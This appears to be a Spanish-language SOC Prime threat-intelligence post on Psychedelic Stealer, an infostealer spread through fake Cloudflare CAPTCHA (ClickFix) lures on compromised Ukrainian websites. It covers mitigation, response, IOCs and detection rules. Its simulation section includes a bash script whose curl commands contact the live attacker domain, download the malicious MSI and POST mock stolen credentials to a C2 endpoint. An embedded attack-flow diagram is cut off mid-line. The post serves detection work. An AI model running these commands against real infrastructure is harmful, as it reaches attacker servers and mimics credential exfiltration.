SOC Prime Bias: High

25 Sep 2026 14:16 UTC

El Ladrón Psicodélico: Cuando un CAPTCHA se Convierte en un Instalador

Author Photo
SOC Prime Team linkedin icon Seguir
El Ladrón Psicodélico: Cuando un CAPTCHA se Convierte en un Instalador
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Arctic Wolf Labs está rastreando una campaña que utiliza señuelos de CAPTCHA falsos de Cloudflare inyectados en sitios web de empresas ucranianas comprometidas. El ataque al estilo ClickFix convence a los usuarios de ejecutar un paquete MSI que instala Psychedelic Stealer, un infostealer diseñado para recopilar credenciales del navegador, tokens de cuentas y datos de billeteras de criptomonedas. El malware también admite tareas remotas persistentes a través de infraestructura C2 dedicada.

Investigación

La investigación descubrió iframes inyectados en sitios web ucranianos legítimos que redireccionan a los visitantes hacia un flujo de verificación falso. Los analistas también identificaron un panel de gestión de señuelos denominado Rublevka TDS, que controla las configuraciones de comando y registra la telemetría de los visitantes. El análisis técnico de la carga útil MSI reveló una URL de siguiente etapa cifrada junto con las rutinas principales del malware para el robo de credenciales y datos.

Mitigación

Las organizaciones deben monitorear la ejecución sospechosa de Windows Installer (msiexec.exe) iniciado por navegadores web o interfaces de línea de comandos. El filtrado web debe bloquear dominios maliciosos conocidos, mientras que los defensores también deben monitorear los activos web legítimos para detectar inyecciones de iframe no autorizadas. Fortalecer los controles de los endpoints en torno a la creación de tareas programadas puede reducir aún más el riesgo de persistencia.

Respuesta

Cuando se detecta actividad de Psychedelic Stealer, aísle los endpoints afectados para detener la exfiltración de datos o el movimiento lateral. Audite los perfiles de los navegadores y el almacenamiento local en busca de credenciales comprometidas, tokens de autenticación y datos de billetera. Revise la telemetría de la red para detectar comunicaciones con infraestructura C2 conocida e inspeccione los sistemas en busca de tareas programadas no autorizadas o hosts de mensajería nativa sospechosos.

<div class="wp-block-socprime-category-attack-flow attack-flow-class" data-title="Attack Flow" data-attack-flow="flowchart TDn step_drive_by["T1189 – Drive-by Compromise<br>Inject iframe into legitimate websites to load malicious script from fsputnik.com"]n step_input_capture["T1056 – Input Capture<br>Use JavaScript helper to copy a malicious Windows Installer command to the clipboard via fake Cloudflare CAPTCHA"]n step_ingress_transfer["T1105 – Ingress Tool Transfer<br>Download and install Psychedelic Stealer via msiexec.exe"]n rules_for_ingress_transfer("<b>Rule Name</b>: Suspicious File Download Direct IP (via proxy)<br/><b>Rule ID</b>: 0fa3da37-f604-4547-939f-1ec135990aad")n step_persistence["T1053.005 – Scheduled Task/Job: Scheduled Task<br>Establish persistence using a scheduled task named psychedelicloveUtils"]n step_credential_theft["Steal passwords and account tokens from Chromium-based browsers"]n step_c2_communication["T1071 – Application Layer Protocol<br>Communicate with C2 server at 193.178.159.128 to retrieve tasks and payloads"]n rules_for_c2_communication("<b>Rule Name</b>: Possible C2 Communications Over HTTP To Direct IP With Uncommon Port (via proxy)<br/><b>Rule ID

Flujo de Ataque

Detecciones

Entrada de RunMRU sospechosa con semántica de LOLBin (mediante registry_event)

Equipo de SOC Prime
25 Sep 2026

Intento de instalación remota de archivo MSI (mediante cmdline)

Equipo de SOC Prime
25 Sep 2026

Posibles comunicaciones C2 sobre HTTP a IP directa con puerto poco común (mediante proxy)

Equipo de SOC Prime
25 Sep 2026

Descarga de archivo sospechosa IP directa (mediante proxy)

Equipo de SOC Prime
25 Sep 2026

IOCs (HashSha256) para detectar: Psychedelic Stealer: Cuando un CAPTCHA se convierte en un instalador

Reglas de AI de SOC Prime
25 Sep 2026

IOCs (SourceIP) para detectar: Psychedelic Stealer: Cuando un CAPTCHA se convierte en un instalador

Reglas de AI de SOC Prime
25 Sep 2026

IOCs (DestinationIP) para detectar: Psychedelic Stealer: Cuando un CAPTCHA se convierte en un instalador

Reglas de AI de SOC Prime
25 Sep 2026

Detección de acceso a la infraestructura de Psychedelic Stealer [Servidor web]

Reglas de AI de SOC Prime
25 Sep 2026

Ejecución de Simulaciones

  • Narrativa del Ataque y Comandos: El adversario pretende infectar un objetivo mediante un mecanismo falso de CAPTCHA. La simulación imitará el comportamiento del navegador de la víctima: primero, navegando a la página de destino del atacante para evitar escrutinio inicial; luego, solicitando la carga útil maliciosa MSI; y finalmente, iniciando una conexión C2 a través de un POST HTTP al script de control del atacante. Esta secuencia está diseñada para imitar los patrones de URI exactos identificados en la infraestructura de Psychedelic Stealer.

  • Script de Prueba de Regresión: El siguiente script usa curl para simular las tres etapas distintas de la lógica de detección.

    #!/bin/bash
    # Script de simulación para acceso a la infraestructura de Psychedelic Stealer
    
    TARGET_DOMAIN="uasputnik.com"
    
    echo "[+] Iniciando simulación de infraestructura de Psychedelic Stealer..."
    
    # Etapa 1: Simular la visita a la página de destino (Selección 1)
    echo "[*] Simulando solicitud GET a la página de destino..."
    curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null
    
    # Etapa 2: Simular la descarga del MSI malicioso (Selección 2)
    echo "[*] Simulando solicitud GET para carga útil..."
    curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null
    
    # Etapa 3: Simular comunicación C2 vía POST (Selección 3)
    echo "[*] Simulando solicitud POST al endpoint C2..."
    curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null
    
    echo "[+] Simulación completa. Verifique SIEM para alertas."
  • Comandos de Limpieza:

    # Dado que esta es una simulación basada en la red, no se crean archivos en el sistema local 
    # a menos que se solicite específicamente. No se requiere limpieza para el sistema de archivos local.
    echo "[+] Limpieza completa."